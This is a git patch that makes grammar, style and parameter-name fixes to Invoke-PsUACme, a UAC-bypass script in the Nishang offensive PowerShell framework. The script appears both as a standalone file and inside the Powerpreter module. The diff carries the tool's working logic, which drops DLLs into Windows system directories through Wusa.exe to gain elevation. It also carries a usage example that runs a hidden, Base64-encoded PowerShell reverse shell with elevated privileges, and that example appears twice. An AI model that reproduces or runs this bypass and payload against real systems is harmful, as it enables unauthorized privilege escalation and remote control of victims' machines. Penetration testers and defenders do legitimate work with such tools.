From b668599a605ee2e028be548936cad9dc1e0729f8 Mon Sep 17 00:00:00 2001 From: Dillon Korman Date: Sun, 4 Oct 2015 10:14:46 -1000 Subject: [PATCH] Grammar and style improvements. Improved grammar and style. --- Escalation/Invoke-PsUACme.ps1 | 72 +++++++++++++++++----------------- powerpreter/Powerpreter.psm1 | 73 +++++++++++++++++------------------ 2 files changed, 72 insertions(+), 73 deletions(-) diff --git a/Escalation/Invoke-PsUACme.ps1 b/Escalation/Invoke-PsUACme.ps1 index 91de533..d29e5f1 100644 --- a/Escalation/Invoke-PsUACme.ps1 +++ b/Escalation/Invoke-PsUACme.ps1 @@ -5,25 +5,25 @@ Nishang script which uses known methods to bypass UAC. .DESCRIPTION -This script implements methods from UACME project ( to bypass UAC on Windows machines. +This script implements methods from the UACME project ( to bypass UAC on Windows machines. It drops DLLs in the known misconfigured/vulnerable locations of Windows machines using Wusa.exe and executes built-in executables -to bypass UAC. Following methods (named mostly on the basis of executables used) are implemented: "sysprep","oobe","ActionQueue", -"migwiz","cliconfg","winsat" and "mmc" +to bypass UAC. The following methods (named mostly after the executables) are implemented: "sysprep", "oobe", "ActionQueue", +"migwiz", "cliconfg", "winsat" and "mmc". -The DLLs dropped by the script is a modified version of Fubuki from the UACME project. It needs separate DLLs for 64 bit and 32 bit machines. -It is able to determine the bit-ness of the process from which it is called and uses the apt DLL. +The DLLs dropped by the script are a modified version of Fubuki from the UACME project. The script needs separate DLLs for 64-bit and 32-bit machines. +It is able to determine the architecture of the process from which it is called and use the appropriate DLL. -The script drops cmd.bat in the C:\Windows\Temp directory and it is this batch file which is called from the DLL. Everything provided +The script drops cmd.bat in the C:\Windows\Temp directory, and it is this batch file which is called from the DLL. Everything provided to the Payload parameter ends up in this batch file. -Wusa.exe on Windows 10 has not "extract" option. Therefore, Invoke-PsUACme does not work on Windows 10 currently. -A clean up is done by the script after payload execution. But the DLLs dropped in secure locations must be removed manually. +Wusa.exe on Windows 10 has no "extract" option. Therefore, Invoke-PsUACme currently does not work on Windows 10. +A clean up is done by the script after payload execution, but the DLLs dropped in secure locations must be removed manually. The script must be run from a process running with medium integrity. .PARAMETER Payload Payload to be executed from the elevated process. Default one checks of the elevation was successful. -.PARAMETER method +.PARAMETER Method The method to be used for elevation. Defaut one is sysprep. .PARAMETER PayloadPath @@ -46,16 +46,16 @@ PS > Invoke-PsUACme -Verbose Above command runs the sysprep method and the default payload. .EXAMPLE -PS > Invoke-PsUACme -method oobe -Verbose +PS > Invoke-PsUACme -Method oobe -Verbose Above command runs the oobe method and the default payload. .EXAMPLE -PS > Invoke-PsUACme -method oobe -Payload "powershell -windowstyle hidden -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAVABaAEYAZABhADgASQB3AEYASQBiAHYAQgAvAHMAUABoADkASwBOAGgATgBuAFEAMQBnADgAMgB5ADQAUwB0AGIAQwBJAE0AbABWAFgAWQBoAFgAZwBSADIANABQAHQAcgBGAFgAcwBFAFIAWAAxAHYAeQA5AHAAYgBlAGQAVgBEAHUASAA5AGUARQA1AGkAaABtAG0AQwBHAGMARQByAEQASABGAHYAagBlAGEALwBHAEIASQBFAHgANQB4AHcASgBZAFoASQBJAGwAaQBIAFMANgBSAGMAVABQAHkAeABYAHkAaQBaADQAYgB5ADQAdwB1AGsAOABDADcAZABwAEMAOABkAG8AdABGAHAATgA3AHAAawA1AGIAVgBHAHUAVgBJAHgAWgBCAG8AbwArAFUAbABEAGMATQBlADUATgA1ADAAZgBDADYAVwB4AG0ANgBqAE4AWABJAGwAdQBJAFQAcgB2AGQAYgBKADgAZgBUAHYAYgBGADIAOABkAEoAaQBvAHkAWgBpAGIAYQBYAFEAZQBJAGIAWgBjAFIASwBmAFEAUABzAEIAcABTAGoAKwBNAEoAcwBRAFQASABuAFkARwBVAEkATgBqADkANQBaAGkAUgBKAEsAaAArADcAdwBiAGMAbQB4AHcAMABPADUAUQBxAHIAUgBTAFoANABJAFAARQBXACsASQBQAEIAUgB4AGEAdQBvAHkAUgBiADgAQwB1AGYARwBxAHMAVwBYAFoATABvAFQAVABDAEwANQBqAEoAYwA2AHQAQQBFAEQAMQBBADIAdQBMADEASABCADgANAB3ADIAcABGAFYAMgB1AEIARwA2AGsASgBCAFgAaABtAGYAdwBCAGcASABZAEsAaQBUAGIAZgBZAFIARgAyAE4ASgBzAGIANwBzAGcAWABIADEAcQBFAEkAZABQAHkAVQBOAGgAbABlAG0AVwBiAGQAYgBNAEIAWgBzADcANQBxAEoALwBUAGYAVQBUAHkAeAArAHQAZwBrAGgAcQAzAE0AVQBkAHoAMQBYAHoAMQBOAHIAUAA5AE4AZABIAGoATgArADgAYQBwAGYAOABkAE4AMQBqAG8AegBmADMALwAwAEIAJwApACkAKQApACwAIABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA==" +PS > Invoke-PsUACme -Method oobe -Payload "powershell -windowstyle hidden -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAVABaAEYAZABhADgASQB3AEYASQBiAHYAQgAvAHMAUABoADkASwBOAGgATgBuAFEAMQBnADgAMgB5ADQAUwB0AGIAQwBJAE0AbABWAFgAWQBoAFgAZwBSADIANABQAHQAcgBGAFgAcwBFAFIAWAAxAHYAeQA5AHAAYgBlAGQAVgBEAHUASAA5AGUARQA1AGkAaABtAG0AQwBHAGMARQByAEQASABGAHYAagBlAGEALwBHAEIASQBFAHgANQB4AHcASgBZAFoASQBJAGwAaQBIAFMANgBSAGMAVABQAHkAeABYAHkAaQBaADQAYgB5ADQAdwB1AGsAOABDADcAZABwAEMAOABkAG8AdABGAHAATgA3AHAAawA1AGIAVgBHAHUAVgBJAHgAWgBCAG8AbwArAFUAbABEAGMATQBlADUATgA1ADAAZgBDADYAVwB4AG0ANgBqAE4AWABJAGwAdQBJAFQAcgB2AGQAYgBKADgAZgBUAHYAYgBGADIAOABkAEoAaQBvAHkAWgBpAGIAYQBYAFEAZQBJAGIAWgBjAFIASwBmAFEAUABzAEIAcABTAGoAKwBNAEoAcwBRAFQASABuAFkARwBVAEkATgBqADkANQBaAGkAUgBKAEsAaAArADcAdwBiAGMAbQB4AHcAMABPADUAUQBxAHIAUgBTAFoANABJAFAARQBXACsASQBQAEIAUgB4AGEAdQBvAHkAUgBiADgAQwB1AGYARwBxAHMAVwBYAFoATABvAFQAVABDAEwANQBqAEoAYwA2AHQAQQBFAEQAMQBBADIAdQBMADEASABCADgANAB3ADIAcABGAFYAMgB1AEIARwA2AGsASgBCAFgAaABtAGYAdwBCAGcASABZAEsAaQBUAGIAZgBZAFIARgAyAE4ASgBzAGIANwBzAGcAWABIADEAcQBFAEkAZABQAHkAVQBOAGgAbABlAG0AVwBiAGQAYgBNAEIAWgBzADcANQBxAEoALwBUAGYAVQBUAHkAeAArAHQAZwBrAGgAcQAzAE0AVQBkAHoAMQBYAHoAMQBOAHIAUAA5AE4AZABIAGoATgArADgAYQBwAGYAOABkAE4AMQBqAG8AegBmADMALwAwAEIAJwApACkAKQApACwAIABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA==" Above command runs the oobe method and the specified payload. The payload in this case is the one liner PowerShell reverse shell -(Shells directory of Nishang) which is base64 encoded using the Invoke-Encode (with the -OutCommand parameter) script from the +from the Shells directory of Nishang, which is Base64 encoded using the Invoke-Encode (with the -OutCommand parameter) script from the Utility directory of Nishang. -The reverse shell in above case runs with elevated privileges. +The reverse shell in the above case runs with elevated privileges. .LINK @@ -72,7 +72,7 @@ [Parameter(Position = 1, Mandatory = $False)] [ValidateSet("sysprep","oobe","ActionQueue","migwiz","cliconfg","winsat","mmc")] [String] - $method = "sysprep", + $Method = "sysprep", [Parameter(Position = 2, Mandatory = $False)] [String] @@ -100,36 +100,36 @@ if ($CustomDll64) { - Write-Verbose "Reading 64 bit DLL." + Write-Verbose "Reading 64-bit DLL." [byte[]]$bytes = [System.IO.File]::ReadAllBytes($CustomDll64) $DllBytes64 = $bytes -join ' ' } elseif ($CustomDll32) { - Write-Verbose "Reading 32 bit DLL." + Write-Verbose "Reading 32-bit DLL." [byte[]]$bytes = [System.IO.File]::ReadAllBytes($CustomDll32) $DllBytes32 = $bytes -join ' ' } if (([IntPtr]::Size) -eq 8) { - Write-Verbose "64 bit process detected." + Write-Verbose "64-bit process detected." $DllBytes = $DllBytes64 } elseif (([IntPtr]::Size) -eq 4) { - Write-Verbose "32 bit process detected." + Write-Verbose "32-bit process detected." $DllBytes = $DllBytes32 } Out-File -FilePath $PayloadPath -InputObject $Payload -Encoding ascii $OSVersion = (Get-WmiObject -Class win32_OperatingSystem).BuildNumber - switch($method) + switch($Method) { "Sysprep" { - Write-Output "Using Sysprep method" + Write-Output "Using Sysprep method." if ($OSVersion -match "76") { Write-Verbose "Windows 7 found!" @@ -152,7 +152,7 @@ if ($OSVersion -match "10") { - Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. " + Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option, which is not supported *yet*." } $Target = "$env:temp\" $wusapath = "C:\Windows\System32\Sysprep\" @@ -168,7 +168,7 @@ "OOBE" { - Write-Output "Using OOBE method" + Write-Output "Using OOBE method." Write-Verbose "Writing DLLs to Temp directory" if ($OSVersion -match "76") { @@ -192,7 +192,7 @@ if ($OSVersion -match "10") { - Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. " + Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option, which is not supported *yet*." } $Target = "$env:temp\" $wusapath = "C:\Windows\System32\oobe\" @@ -208,7 +208,7 @@ "ActionQueue" { - Write-Output "Using Sysprep Actionqueue method" + Write-Output "Using Sysprep Actionqueue method." if ($OSVersion -match "76") { Write-Verbose "Windows 7 found!" @@ -221,12 +221,12 @@ if ($OSVersion -match "96") { - Write-Warning "This method doesn't work Windows 8.1 onwards." + Write-Warning "This method does not work beyond Windows 8.1." } if ($OSVersion -match "10") { - Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. " + Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option, which is not supported *yet*." } $Target = "$env:temp\" $wusapath = "C:\Windows\System32\Sysprep\" @@ -242,7 +242,7 @@ "migwiz" { - Write-Output "Using migwiz method" + Write-Output "Using migwiz method." if ($OSVersion -match "76") { Write-Verbose "Windows 7 found!" @@ -265,7 +265,7 @@ if ($OSVersion -match "10") { - Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. " + Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option, which is not supported *yet*." } $Target = "$env:temp\" $wusapath = "C:\Windows\System32\migwiz\" @@ -281,7 +281,7 @@ "cliconfg" { - Write-Output "Using cliconfg method" + Write-Output "Using cliconfg method." if ($OSVersion -match "76") { Write-Verbose "Windows 7 found!" @@ -304,7 +304,7 @@ if ($OSVersion -match "10") { - Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. " + Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option, which is not supported *yet*." } $Target = "$env:temp\" $wusapath = "C:\Windows\System32\" @@ -320,7 +320,7 @@ "winsat" { - Write-Output "Using winsat method" + Write-Output "Using winsat method." if ($OSVersion -match "76") { Write-Verbose "Windows 7 found!" @@ -343,7 +343,7 @@ if ($OSVersion -match "10") { - Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. " + Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option, which is not supported *yet*." } $Target = "$env:temp\" $wusapath = "C:\Windows\System32\sysprep\" @@ -366,7 +366,7 @@ "mmc" { - Write-Output "Using mmc method" + Write-Output "Using mmc method." if ($OSVersion -match "76") { Write-Verbose "Windows 7 found!" @@ -389,7 +389,7 @@ if ($OSVersion -match "10") { - Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. " + Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option, which is not supported *yet*." } $Target = "$env:temp\" $wusapath = "C:\Windows\System32\" @@ -404,7 +404,7 @@ } } - #Clean up + # Clean up Write-Verbose "Removing $Target." Remove-Item -Path $Target Write-Verbose "Removing $PathToDll." @@ -412,4 +412,4 @@ Write-Verbose "$wusapath$dllname must be removed manually." Write-Verbose "$PayloadPath must be removed manually." -} +} \ No newline at end of file diff --git a/powerpreter/Powerpreter.psm1 b/powerpreter/Powerpreter.psm1 index aa6f5a4..675797f 100644 --- a/powerpreter/Powerpreter.psm1 +++ b/powerpreter/Powerpreter.psm1 @@ -6687,25 +6687,25 @@ function Invoke-PsUACme Nishang script which uses known methods to bypass UAC. .DESCRIPTION -This script implements methods from UACME project ( to bypass UAC on Windows machines. +This script implements methods from the UACME project ( to bypass UAC on Windows machines. It drops DLLs in the known misconfigured/vulnerable locations of Windows machines using Wusa.exe and executes built-in executables -to bypass UAC. Following methods (named mostly on the basis of executables used) are implemented: "sysprep","oobe","ActionQueue", -"migwiz","cliconfg","winsat" and "mmc" +to bypass UAC. The following methods (named mostly after the executables) are implemented: "sysprep", "oobe", "ActionQueue", +"migwiz", "cliconfg", "winsat" and "mmc". -The DLLs dropped by the script is a modified version of Fubuki from the UACME project. It needs separate DLLs for 64 bit and 32 bit machines. -It is able to determine the bit-ness of the process from which it is called and uses the apt DLL. +The DLLs dropped by the script are a modified version of Fubuki from the UACME project. The script needs separate DLLs for 64-bit and 32-bit machines. +It is able to determine the architecture of the process from which it is called and use the appropriate DLL. -The script drops cmd.bat in the C:\Windows\Temp directory and it is this batch file which is called from the DLL. Everything provided +The script drops cmd.bat in the C:\Windows\Temp directory, and it is this batch file which is called from the DLL. Everything provided to the Payload parameter ends up in this batch file. -Wusa.exe on Windows 10 has not "extract" option. Therefore, Invoke-PsUACme does not work on Windows 10 currently. -A clean up is done by the script after payload execution. But the DLLs dropped in secure locations must be removed manually. +Wusa.exe on Windows 10 has no "extract" option. Therefore, Invoke-PsUACme currently does not work on Windows 10. +A clean up is done by the script after payload execution, but the DLLs dropped in secure locations must be removed manually. The script must be run from a process running with medium integrity. .PARAMETER Payload Payload to be executed from the elevated process. Default one checks of the elevation was successful. -.PARAMETER method +.PARAMETER Method The method to be used for elevation. Defaut one is sysprep. .PARAMETER PayloadPath @@ -6728,16 +6728,16 @@ PS > Invoke-PsUACme -Verbose Above command runs the sysprep method and the default payload. .EXAMPLE -PS > Invoke-PsUACme -method oobe -Verbose +PS > Invoke-PsUACme -Method oobe -Verbose Above command runs the oobe method and the default payload. .EXAMPLE -PS > Invoke-PsUACme -method oobe -Payload "powershell -windowstyle hidden -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAVABaAEYAZABhADgASQB3AEYASQBiAHYAQgAvAHMAUABoADkASwBOAGgATgBuAFEAMQBnADgAMgB5ADQAUwB0AGIAQwBJAE0AbABWAFgAWQBoAFgAZwBSADIANABQAHQAcgBGAFgAcwBFAFIAWAAxAHYAeQA5AHAAYgBlAGQAVgBEAHUASAA5AGUARQA1AGkAaABtAG0AQwBHAGMARQByAEQASABGAHYAagBlAGEALwBHAEIASQBFAHgANQB4AHcASgBZAFoASQBJAGwAaQBIAFMANgBSAGMAVABQAHkAeABYAHkAaQBaADQAYgB5ADQAdwB1AGsAOABDADcAZABwAEMAOABkAG8AdABGAHAATgA3AHAAawA1AGIAVgBHAHUAVgBJAHgAWgBCAG8AbwArAFUAbABEAGMATQBlADUATgA1ADAAZgBDADYAVwB4AG0ANgBqAE4AWABJAGwAdQBJAFQAcgB2AGQAYgBKADgAZgBUAHYAYgBGADIAOABkAEoAaQBvAHkAWgBpAGIAYQBYAFEAZQBJAGIAWgBjAFIASwBmAFEAUABzAEIAcABTAGoAKwBNAEoAcwBRAFQASABuAFkARwBVAEkATgBqADkANQBaAGkAUgBKAEsAaAArADcAdwBiAGMAbQB4AHcAMABPADUAUQBxAHIAUgBTAFoANABJAFAARQBXACsASQBQAEIAUgB4AGEAdQBvAHkAUgBiADgAQwB1AGYARwBxAHMAVwBYAFoATABvAFQAVABDAEwANQBqAEoAYwA2AHQAQQBFAEQAMQBBADIAdQBMADEASABCADgANAB3ADIAcABGAFYAMgB1AEIARwA2AGsASgBCAFgAaABtAGYAdwBCAGcASABZAEsAaQBUAGIAZgBZAFIARgAyAE4ASgBzAGIANwBzAGcAWABIADEAcQBFAEkAZABQAHkAVQBOAGgAbABlAG0AVwBiAGQAYgBNAEIAWgBzADcANQBxAEoALwBUAGYAVQBUAHkAeAArAHQAZwBrAGgAcQAzAE0AVQBkAHoAMQBYAHoAMQBOAHIAUAA5AE4AZABIAGoATgArADgAYQBwAGYAOABkAE4AMQBqAG8AegBmADMALwAwAEIAJwApACkAKQApACwAIABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA==" +PS > Invoke-PsUACme -Method oobe -Payload "powershell -windowstyle hidden -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAVABaAEYAZABhADgASQB3AEYASQBiAHYAQgAvAHMAUABoADkASwBOAGgATgBuAFEAMQBnADgAMgB5ADQAUwB0AGIAQwBJAE0AbABWAFgAWQBoAFgAZwBSADIANABQAHQAcgBGAFgAcwBFAFIAWAAxAHYAeQA5AHAAYgBlAGQAVgBEAHUASAA5AGUARQA1AGkAaABtAG0AQwBHAGMARQByAEQASABGAHYAagBlAGEALwBHAEIASQBFAHgANQB4AHcASgBZAFoASQBJAGwAaQBIAFMANgBSAGMAVABQAHkAeABYAHkAaQBaADQAYgB5ADQAdwB1AGsAOABDADcAZABwAEMAOABkAG8AdABGAHAATgA3AHAAawA1AGIAVgBHAHUAVgBJAHgAWgBCAG8AbwArAFUAbABEAGMATQBlADUATgA1ADAAZgBDADYAVwB4AG0ANgBqAE4AWABJAGwAdQBJAFQAcgB2AGQAYgBKADgAZgBUAHYAYgBGADIAOABkAEoAaQBvAHkAWgBpAGIAYQBYAFEAZQBJAGIAWgBjAFIASwBmAFEAUABzAEIAcABTAGoAKwBNAEoAcwBRAFQASABuAFkARwBVAEkATgBqADkANQBaAGkAUgBKAEsAaAArADcAdwBiAGMAbQB4AHcAMABPADUAUQBxAHIAUgBTAFoANABJAFAARQBXACsASQBQAEIAUgB4AGEAdQBvAHkAUgBiADgAQwB1AGYARwBxAHMAVwBYAFoATABvAFQAVABDAEwANQBqAEoAYwA2AHQAQQBFAEQAMQBBADIAdQBMADEASABCADgANAB3ADIAcABGAFYAMgB1AEIARwA2AGsASgBCAFgAaABtAGYAdwBCAGcASABZAEsAaQBUAGIAZgBZAFIARgAyAE4ASgBzAGIANwBzAGcAWABIADEAcQBFAEkAZABQAHkAVQBOAGgAbABlAG0AVwBiAGQAYgBNAEIAWgBzADcANQBxAEoALwBUAGYAVQBUAHkAeAArAHQAZwBrAGgAcQAzAE0AVQBkAHoAMQBYAHoAMQBOAHIAUAA5AE4AZABIAGoATgArADgAYQBwAGYAOABkAE4AMQBqAG8AegBmADMALwAwAEIAJwApACkAKQApACwAIABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA==" Above command runs the oobe method and the specified payload. The payload in this case is the one liner PowerShell reverse shell -(Shells directory of Nishang) which is base64 encoded using the Invoke-Encode (with the -OutCommand parameter) script from the +from the Shells directory of Nishang, which is Base64 encoded using the Invoke-Encode (with the -OutCommand parameter) script from the Utility directory of Nishang. -The reverse shell in above case runs with elevated privileges. +The reverse shell in the above case runs with elevated privileges. .LINK @@ -6754,7 +6754,7 @@ [Parameter(Position = 1, Mandatory = $False)] [ValidateSet("sysprep","oobe","ActionQueue","migwiz","cliconfg","winsat","mmc")] [String] - $method = "sysprep", + $Method = "sysprep", [Parameter(Position = 2, Mandatory = $False)] [String] @@ -6782,36 +6782,36 @@ if ($CustomDll64) { - Write-Verbose "Reading 64 bit DLL." + Write-Verbose "Reading 64-bit DLL." [byte[]]$bytes = [System.IO.File]::ReadAllBytes($CustomDll64) $DllBytes64 = $bytes -join ' ' } elseif ($CustomDll32) { - Write-Verbose "Reading 32 bit DLL." + Write-Verbose "Reading 32-bit DLL." [byte[]]$bytes = [System.IO.File]::ReadAllBytes($CustomDll32) $DllBytes32 = $bytes -join ' ' } if (([IntPtr]::Size) -eq 8) { - Write-Verbose "64 bit process detected." + Write-Verbose "64-bit process detected." $DllBytes = $DllBytes64 } elseif (([IntPtr]::Size) -eq 4) { - Write-Verbose "32 bit process detected." + Write-Verbose "32-bit process detected." $DllBytes = $DllBytes32 } Out-File -FilePath $PayloadPath -InputObject $Payload -Encoding ascii $OSVersion = (Get-WmiObject -Class win32_OperatingSystem).BuildNumber - switch($method) + switch($Method) { "Sysprep" { - Write-Output "Using Sysprep method" + Write-Output "Using Sysprep method." if ($OSVersion -match "76") { Write-Verbose "Windows 7 found!" @@ -6834,7 +6834,7 @@ if ($OSVersion -match "10") { - Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. " + Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option, which is not supported *yet*." } $Target = "$env:temp\" $wusapath = "C:\Windows\System32\Sysprep\" @@ -6850,7 +6850,7 @@ "OOBE" { - Write-Output "Using OOBE method" + Write-Output "Using OOBE method." Write-Verbose "Writing DLLs to Temp directory" if ($OSVersion -match "76") { @@ -6874,7 +6874,7 @@ if ($OSVersion -match "10") { - Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. " + Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option, which is not supported *yet*." } $Target = "$env:temp\" $wusapath = "C:\Windows\System32\oobe\" @@ -6890,7 +6890,7 @@ "ActionQueue" { - Write-Output "Using Sysprep Actionqueue method" + Write-Output "Using Sysprep Actionqueue method." if ($OSVersion -match "76") { Write-Verbose "Windows 7 found!" @@ -6903,12 +6903,12 @@ if ($OSVersion -match "96") { - Write-Warning "This method doesn't work Windows 8.1 onwards." + Write-Warning "This method does not work beyond Windows 8.1." } if ($OSVersion -match "10") { - Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. " + Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option, which is not supported *yet*." } $Target = "$env:temp\" $wusapath = "C:\Windows\System32\Sysprep\" @@ -6924,7 +6924,7 @@ "migwiz" { - Write-Output "Using migwiz method" + Write-Output "Using migwiz method." if ($OSVersion -match "76") { Write-Verbose "Windows 7 found!" @@ -6947,7 +6947,7 @@ if ($OSVersion -match "10") { - Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. " + Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option, which is not supported *yet*." } $Target = "$env:temp\" $wusapath = "C:\Windows\System32\migwiz\" @@ -6963,7 +6963,7 @@ "cliconfg" { - Write-Output "Using cliconfg method" + Write-Output "Using cliconfg method." if ($OSVersion -match "76") { Write-Verbose "Windows 7 found!" @@ -6986,7 +6986,7 @@ if ($OSVersion -match "10") { - Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. " + Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option, which is not supported *yet*." } $Target = "$env:temp\" $wusapath = "C:\Windows\System32\" @@ -7002,7 +7002,7 @@ "winsat" { - Write-Output "Using winsat method" + Write-Output "Using winsat method." if ($OSVersion -match "76") { Write-Verbose "Windows 7 found!" @@ -7025,7 +7025,7 @@ if ($OSVersion -match "10") { - Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. " + Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option, which is not supported *yet*." } $Target = "$env:temp\" $wusapath = "C:\Windows\System32\sysprep\" @@ -7048,7 +7048,7 @@ "mmc" { - Write-Output "Using mmc method" + Write-Output "Using mmc method." if ($OSVersion -match "76") { Write-Verbose "Windows 7 found!" @@ -7071,7 +7071,7 @@ if ($OSVersion -match "10") { - Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. " + Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option, which is not supported *yet*." } $Target = "$env:temp\" $wusapath = "C:\Windows\System32\" @@ -7086,7 +7086,7 @@ } } - #Clean up + # Clean up Write-Verbose "Removing $Target." Remove-Item -Path $Target Write-Verbose "Removing $PathToDll." @@ -7094,5 +7094,4 @@ Write-Verbose "$wusapath$dllname must be removed manually." Write-Verbose "$PayloadPath must be removed manually." -} - \ No newline at end of file +} \ No newline at end of file